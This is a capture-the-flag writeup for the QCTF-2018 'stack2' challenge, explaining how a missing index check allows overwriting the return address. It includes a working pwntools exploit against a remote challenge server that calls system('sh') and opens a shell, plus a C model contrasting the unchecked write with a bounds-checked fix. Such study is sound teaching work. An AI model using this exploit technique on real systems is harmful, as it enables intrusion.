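Challenge source: XCTF 4th-QCTF-2018
Challenge description: none
The program's change number feature does not validate the index, so it can write to arbitrary addresses; overwriting the return address is enough.
This challenge is slightly broken: the backdoor function it provides is system("/bin/bash"), but calling it reports that bash cannot be found. It is still solvable.
The approach is to build the call yourself: overwrite the return address with p32(system_plt)+p32(ret_addr)+p32(address of the string "sh").
The exploit is as follows: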
```python
from pwn import *

#io = gdb.debug('./stack2', 'b *0x8048839')
#io = process('./stack2')
io = remote('111.200.241.244', 56178)

MENU = b'1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit\n'

def change_number(pos, val):
    # Menu option 3: write one byte `val` at index `pos` (the index is not checked)
    io.recvuntil(MENU)
    io.sendline(b'3')
    io.recvuntil(b'which number to change:\n')
    io.sendline(str(pos).encode())
    io.recvuntil(b'new number:')
    io.sendline(str(val).encode())

# Initial prompts: enter a single number
io.recvuntil(b'How many numbers you have:\n')
io.sendline(b'1')
io.recvuntil(b'Give me your numbers\n')
io.sendline(b'1')

# Return address at offset 132: 0x08048450 (system_plt), little-endian
change_number(132, 0x50)
change_number(133, 0x84)
change_number(134, 0x04)
change_number(135, 0x08)
# 0x080485d0 (ret_addr)
change_number(136, 0xd0)
change_number(137, 0x85)
change_number(138, 0x04)
change_number(139, 0x08)
# 0x08048987 (argument to system: the "sh" string)
change_number(140, 0x87)
change_number(141, 0x89)
change_number(142, 0x04)
change_number(143, 0x08)

# Option 5 exits, so the function returns through the overwritten address
io.recvuntil(MENU)
io.sendline(b'5')
io.interactive()
```
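The missing index check in change number, next to the bounds check that closes it, as an added example that is not code from the challenge binary or from the original writeup. The 160-byte `frame` model, the 100-byte capacity, the placeholder return address and all function names are assumptions; only the offset 132 comes from the exploit above.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model, not the challenge binary: `frame` stands in for the
 * stack frame, with the number buffer at the bottom and the saved return
 * address at byte offset 132, the offset the exploit on this page uses. */
#define NUM_CAP   100   /* assumed capacity of the number buffer */
#define RET_OFF   132   /* offset taken from the page's exploit */
#define FRAME_LEN 160   /* assumed size of the modelled frame */

typedef struct {
    unsigned char frame[FRAME_LEN];
    unsigned count;     /* how many numbers the user has entered */
} model_t;

void model_init(model_t *m, unsigned count) {
    /* constructed placeholder return address 0x11223344, little-endian */
    const unsigned char ret[4] = {0x44, 0x33, 0x22, 0x11};
    memset(m->frame, 0, sizeof m->frame);
    memcpy(m->frame + RET_OFF, ret, sizeof ret);
    m->count = count;
}

/* Read back the modelled saved return address. */
uint32_t model_ret(const model_t *m) {
    const unsigned char *p = m->frame + RET_OFF;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Behaviour the writeup describes: the index is used without validation,
 * so an index past the buffer lands on whatever the frame holds there. */
int change_unchecked(model_t *m, int idx, unsigned char val) {
    m->frame[idx] = val;
    return 0;
}

/* Hardened form: reject negative indexes, indexes at or past the number
 * of stored entries, and a count larger than the buffer itself. */
int change_checked(model_t *m, int idx, unsigned char val) {
    if (idx < 0 || m->count > NUM_CAP || (unsigned)idx >= m->count)
        return -1;
    m->frame[idx] = val;
    return 0;
}
```
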